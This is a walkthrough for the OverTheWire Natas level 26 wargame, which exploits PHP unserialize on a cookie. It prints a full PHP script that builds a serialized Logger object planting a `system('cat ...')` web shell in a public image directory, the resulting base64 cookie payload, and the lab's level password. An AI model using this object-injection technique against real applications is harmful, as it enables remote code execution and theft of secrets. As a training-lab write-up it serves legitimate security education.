Level 25 - Level 26

Username: natas26
Password: 8A506rfIAXbKKk68yJeuTuRq4UfcK70k
URL:      http://natas26.natas.labs.overthewire.org

Overview

This time we got page with four inputs and a link to the source code.

Source Code Analysis

Let's take a look at the source code.

There is class Logger, which basically logs the message to the defined logFile.

I checked the entire source code, but there is no object is created with the class Logger, its not used anywhere.

Next, the showImage() function, simply shows the image file. The drawImage() function, creates an image witht the data from the drawFromUserdata() function.

The drawFromUserdata() function, first checks for the URL parameters x1, x2, y1, y2 and if it exists it generates the image. Next it checks out whether the cookie drawing exists, and if so, it base64 decodes the cookie drawing and unserialize the contents and generate the image using the contents that is decoded. Usage of PHP unserialize function on a cookie value is vulnerable, since the cookie can be modified by the user, and if the cookie contains php code snippets, it will be executed. To know more check the following resource:

PHP: unserialize - Manual

The storeData() function also utilizes the PHP unserialize function, to read the cookie if present and set's the cookie.

Exploiting the Vulnerability

We can leverage the above mentioned vulnerability to get the password for the next level. But for that we need a valid php serialized object, which reads the password file and display the output. For this purpose, we can make use of the Logger() function that we saw earlier, since we can generate a valid PHP object as it is a class and it writes the output to a file.

If we are gonna get and store the password in a file, we have to make sure that its publicly accessible. So we have to store the output file in a location that we could access.

From the source code we can see that the image files are located at img directory, which is publicly accessible. So we can make use of this directory. I copied the Logger() class and created a php script which will create a object with the Logger() class, serialize it and encode it using base64.

The following PHP script will perform the above mentioned action. I have made a few changes to the __construct() function, adding php code snippets that read the contents of the natas27 file and store it in the file that is located at img/password.php, which is publicly accessible. From the output of the below script, we will get a valid cookie [ Ignore the errors generated by the script ].

<?php
    class Logger{
        private $logFile;
        private $initMsg;
        private $exitMsg;

        function __construct(){
            // initialise variables
            $this->initMsg="<?php system('cat /etc/natas_webpass/natas27'); ?>";
            $this->exitMsg="<?php system('cat /etc/natas_webpass/natas27'); ?>";
            $this->logFile = "img/password.php";

            // write initial message
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$this->initMsg);
            fclose($fd);
        }

        function log($msg){
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$msg."\n");
            fclose($fd);
        }

        function __destruct(){
            // write exit message
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$this->exitMsg);
            fclose($fd);
        }
    }
    
    $object = new Logger();
    
    echo base64_encode(serialize($object));
?>

Valid cookie generated by the above script:

Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoxNjoiaW1nL3Bhc3N3b3JkLnBocCI7czoxNToiAExvZ2dlcgBpbml0TXNnIjtzOjUwOiI8P3BocCBzeXN0ZW0oJ2NhdCAvZXRjL25hdGFzX3dlYnBhc3MvbmF0YXMyNycpOyA/PiI7czoxNToiAExvZ2dlcgBleGl0TXNnIjtzOjUwOiI8P3BocCBzeXN0ZW0oJ2NhdCAvZXRjL25hdGFzX3dlYnBhc3MvbmF0YXMyNycpOyA/PiI7fQ==

I captured the request to the web page using burpsuite and modified the value of the cookie drawing with the cookie that we generated, which responded with an error, indicating successfull execution of code.